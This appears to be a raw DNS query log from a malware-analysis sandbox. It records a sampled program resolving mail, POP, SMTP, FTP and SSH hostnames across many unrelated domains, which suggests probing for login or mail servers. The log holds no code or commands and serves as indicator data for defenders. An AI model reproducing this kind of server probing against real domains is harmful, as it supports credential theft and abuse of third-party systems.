                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.208451033 CET1.1.1.1192.168.2.60xa925Name error (3)pop.casinocontroller.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.208468914 CET1.1.1.1192.168.2.60x8fe7No error (0)alt1.aspmx.l.google.com172.217.197.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.209479094 CET1.1.1.1192.168.2.60x547aName error (3)mailgate.naukrigulf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.212778091 CET1.1.1.1192.168.2.60xbf68No error (0)relay.opsu.terna.net104.21.5.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.212778091 CET1.1.1.1192.168.2.60xbf68No error (0)relay.opsu.terna.net172.67.132.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.214665890 CET1.1.1.1192.168.2.60x5013No error (0)mail.opsu.terna.net104.21.5.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.214665890 CET1.1.1.1192.168.2.60x5013No error (0)mail.opsu.terna.net172.67.132.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.217096090 CET1.1.1.1192.168.2.60x793No error (0)mx.zoho.com204.141.43.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.220700979 CET1.1.1.1192.168.2.60x358aNo error (0)mail.pxndx-mcr.boletia.com54.85.194.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.220700979 CET1.1.1.1192.168.2.60x358aNo error (0)mail.pxndx-mcr.boletia.com3.219.54.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.220700979 CET1.1.1.1192.168.2.60x358aNo error (0)mail.pxndx-mcr.boletia.com52.21.29.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.220700979 CET1.1.1.1192.168.2.60x358aNo error (0)mail.pxndx-mcr.boletia.com44.199.96.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.222278118 CET1.1.1.1192.168.2.60x3ea8Name error (3)mailgate.vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.275041103 CET1.1.1.1192.168.2.60x669eName error (3)mailgate.ro.bongacams.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.278400898 CET1.1.1.1192.168.2.60xb346No error (0)m.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.278400898 CET1.1.1.1192.168.2.60xb346No error (0)star-mini.c10r.facebook.com31.13.88.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.280081987 CET1.1.1.1192.168.2.60x13e6No error (0)pop.netizion.com45.43.208.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.286684036 CET1.1.1.1192.168.2.60x2872Name error (3)pop3.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.317949057 CET1.1.1.1192.168.2.60xcb0dName error (3)mail.pan.baidu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.322710991 CET1.1.1.1192.168.2.60xecc9Name error (3)mail.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.329864025 CET1.1.1.1192.168.2.60xe433Server failure (2)mail.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.335774899 CET1.1.1.1192.168.2.60x498eName error (3)mail.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.369383097 CET1.1.1.1192.168.2.60xc64fName error (3)mail.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.379020929 CET1.1.1.1192.168.2.60x88f7No error (0)mail.mega.co.nz122.56.56.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.415092945 CET1.1.1.1192.168.2.60x6faNo error (0)mx2.hostinger.com172.65.182.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.424264908 CET1.1.1.1192.168.2.60x498eName error (3)mail.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.424443007 CET1.1.1.1192.168.2.60xcb0dName error (3)mail.pan.baidu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.448195934 CET1.1.1.1192.168.2.60x5a93Name error (3)mail.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.481926918 CET1.1.1.1192.168.2.60x91c6Name error (3)mail.servicossociais.caixa.gov.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.498141050 CET1.1.1.1192.168.2.60xd9ebNo error (0)www.minecraft.netwww.minecraft.net-v1.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.508480072 CET1.1.1.1192.168.2.60x922aName error (3)smtp.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.524279118 CET1.1.1.1192.168.2.60xc722Server failure (2)mail.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.544905901 CET1.1.1.1192.168.2.60xfb97No error (0)ww1.chainmine.iosedoparking.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.544905901 CET1.1.1.1192.168.2.60xfb97No error (0)sedoparking.com64.190.63.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.564585924 CET1.1.1.1192.168.2.60x922aName error (3)smtp.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.564637899 CET1.1.1.1192.168.2.60x91c6Name error (3)mail.servicossociais.caixa.gov.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566948891 CET1.1.1.1192.168.2.60xe088No error (0)www.analvids.comanalvids.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566948891 CET1.1.1.1192.168.2.60xe088No error (0)analvids.com185.120.71.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566948891 CET1.1.1.1192.168.2.60xe088No error (0)analvids.com185.120.71.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.566948891 CET1.1.1.1192.168.2.60xe088No error (0)analvids.com185.120.71.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.695116997 CET1.1.1.1192.168.2.60xf5d2No error (0)mail.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com185.78.166.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg.alibaba.com.gds.alibabadns.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710212946 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com47.246.167.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710340023 CET1.1.1.1192.168.2.60x2ac9No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710340023 CET1.1.1.1192.168.2.60x2ac9No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710340023 CET1.1.1.1192.168.2.60x2ac9No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710340023 CET1.1.1.1192.168.2.60x2ac9No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710340023 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710340023 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg.alibaba.com.gds.alibabadns.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710340023 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710340023 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com47.246.167.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710356951 CET1.1.1.1192.168.2.60x2ac9No error (0)m.sellercenter.lazada.com.myasc-hub.lazada.com.myCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710356951 CET1.1.1.1192.168.2.60x2ac9No error (0)asc-hub.lazada.com.myxjp.wagbridge-lazada.alibaba-inc.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710356951 CET1.1.1.1192.168.2.60x2ac9No error (0)xjp.wagbridge-lazada.alibaba-inc.comxjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710356951 CET1.1.1.1192.168.2.60x2ac9No error (0)xjp.wagbridge-lazada.alibaba-inc.com.gds.alibabadns.comlazada-sg.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710356951 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg.alibaba.comlazada-sg.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710356951 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg.alibaba.com.gds.alibabadns.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710356951 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.comlazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710356951 CET1.1.1.1192.168.2.60x2ac9No error (0)lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.com47.246.167.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.737447023 CET1.1.1.1192.168.2.60x8f68No error (0)mail.innovationdevelopment.euinnovationdevelopment.euCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.737447023 CET1.1.1.1192.168.2.60x8f68No error (0)innovationdevelopment.eu185.51.191.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.737515926 CET1.1.1.1192.168.2.60x8f68No error (0)mail.innovationdevelopment.euinnovationdevelopment.euCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.737515926 CET1.1.1.1192.168.2.60x8f68No error (0)innovationdevelopment.eu185.51.191.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.799582958 CET1.1.1.1192.168.2.60xd98dName error (3)mail.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.799598932 CET1.1.1.1192.168.2.60xd98dName error (3)mail.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.808912039 CET1.1.1.1192.168.2.60xf5d2No error (0)mail.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com185.78.166.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.860889912 CET1.1.1.1192.168.2.60x6682Name error (3)mail.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.860951900 CET1.1.1.1192.168.2.60x6682Name error (3)mail.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.872693062 CET1.1.1.1192.168.2.60x822cNo error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.872711897 CET1.1.1.1192.168.2.60x822cNo error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.953417063 CET1.1.1.1192.168.2.60x5e35Name error (3)pop3.store.steampowered.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.954787016 CET1.1.1.1192.168.2.60xa8c9Name error (3)pop3.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.010889053 CET1.1.1.1192.168.2.60xc019No error (0)www.casinocontroller.com104.22.43.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.010889053 CET1.1.1.1192.168.2.60xc019No error (0)www.casinocontroller.com104.22.42.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.010889053 CET1.1.1.1192.168.2.60xc019No error (0)www.casinocontroller.com172.67.11.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.051867962 CET1.1.1.1192.168.2.60xd5fNo error (0)www.hero-wars.comwww.hero-wars.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.054265022 CET1.1.1.1192.168.2.60x57a3No error (0)mail.multiideas.commultiideas.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.054265022 CET1.1.1.1192.168.2.60x57a3No error (0)multiideas.com192.185.5.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.082952976 CET1.1.1.1192.168.2.60x87dfNo error (0)ww16.followerstiktok.xyzwww.sedoparking.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.082952976 CET1.1.1.1192.168.2.60x87dfNo error (0)www.sedoparking.com64.190.63.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.098778963 CET1.1.1.1192.168.2.60x5739No error (0)hartico.tv104.21.6.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.098778963 CET1.1.1.1192.168.2.60x5739No error (0)hartico.tv172.67.134.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.117733002 CET1.1.1.1192.168.2.60x5c26No error (0)www.kwyk.frkwyk-lb-1828602630.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.117733002 CET1.1.1.1192.168.2.60x5c26No error (0)kwyk-lb-1828602630.eu-west-1.elb.amazonaws.com54.75.198.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.117733002 CET1.1.1.1192.168.2.60x5c26No error (0)kwyk-lb-1828602630.eu-west-1.elb.amazonaws.com46.51.171.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.123847008 CET1.1.1.1192.168.2.60xaa30Name error (3)ftp.servicios.sat.gob.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.259013891 CET1.1.1.1192.168.2.60x7815Name error (3)pop.pan.baidu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.263964891 CET1.1.1.1192.168.2.60x302cName error (3)pop3.netizion.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.521038055 CET1.1.1.1192.168.2.60xf292No error (0)www.tiktok.comwww.tiktok.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.545700073 CET1.1.1.1192.168.2.60xbc0No error (0)xsaniime.com172.67.214.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.545700073 CET1.1.1.1192.168.2.60xbc0No error (0)xsaniime.com104.21.37.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.571311951 CET1.1.1.1192.168.2.60x2a9No error (0)www.uh.is82.221.28.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.585088968 CET1.1.1.1192.168.2.60x2a9No error (0)www.uh.is82.221.28.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.986318111 CET1.1.1.1192.168.2.60xa1dbName error (3)ftp.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.009598017 CET1.1.1.1192.168.2.60x14deName error (3)relay.signin.rockstargames.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.011646986 CET1.1.1.1192.168.2.60x3ceeName error (3)pop3.casinocontroller.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.037107944 CET1.1.1.1192.168.2.60xcb4dServer failure (2)ftp.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.048204899 CET1.1.1.1192.168.2.60x7408Name error (3)ftp.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.069518089 CET1.1.1.1192.168.2.60x2563Name error (3)ftp.vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.106301069 CET1.1.1.1192.168.2.60x3f8bName error (3)mail.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.175657988 CET1.1.1.1192.168.2.60x39bbName error (3)ftp.signup2.br.leagueoflegends.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.321521997 CET1.1.1.1192.168.2.60xe892No error (0)store.steampowered.com23.46.200.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.322833061 CET1.1.1.1192.168.2.60xbc6fNo error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.325141907 CET1.1.1.1192.168.2.60xd738No error (0)www.phonandroid.com172.67.218.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.325141907 CET1.1.1.1192.168.2.60xd738No error (0)www.phonandroid.com104.21.67.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.325227022 CET1.1.1.1192.168.2.60x7340Name error (3)ftp.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.331320047 CET1.1.1.1192.168.2.60x473fName error (3)ftp.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.373661041 CET1.1.1.1192.168.2.60xf42eName error (3)ftp.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.391844988 CET1.1.1.1192.168.2.60x7c80No error (0)www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comxn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.391844988 CET1.1.1.1192.168.2.60x7c80No error (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com185.78.166.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.391856909 CET1.1.1.1192.168.2.60x7c80No error (0)www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comxn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.391856909 CET1.1.1.1192.168.2.60x7c80No error (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com185.78.166.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.393022060 CET1.1.1.1192.168.2.60xf0f8Name error (3)pop.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.429923058 CET1.1.1.1192.168.2.60xf0f8Name error (3)pop.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.430314064 CET1.1.1.1192.168.2.60x473fName error (3)ftp.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.430325031 CET1.1.1.1192.168.2.60x7340Name error (3)ftp.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.457437992 CET1.1.1.1192.168.2.60xa4d3Name error (3)mail.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.475892067 CET1.1.1.1192.168.2.60x7d49Name error (3)smtp.v.xsanime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.493398905 CET1.1.1.1192.168.2.60x76daName error (3)pop.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.494349003 CET1.1.1.1192.168.2.60x413eName error (3)mail.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.502909899 CET1.1.1.1192.168.2.60x88aName error (3)ftp.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.519500017 CET1.1.1.1192.168.2.60x17c0Name error (3)ftp.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.525675058 CET1.1.1.1192.168.2.60xf1d3Name error (3)pop.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.533930063 CET1.1.1.1192.168.2.60xc5d3Name error (3)ssh.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.534929037 CET1.1.1.1192.168.2.60x81e6Server failure (2)ssh.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.541579008 CET1.1.1.1192.168.2.60x964Name error (3)mail.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.550721884 CET1.1.1.1192.168.2.60x2851Name error (3)mailgate.store.steampowered.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.551378965 CET1.1.1.1192.168.2.60x8dcaName error (3)mailgate.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.564759016 CET1.1.1.1192.168.2.60x8f49Name error (3)ssh.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.569701910 CET1.1.1.1192.168.2.60xe940No error (0)ww12.chainmine.io084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
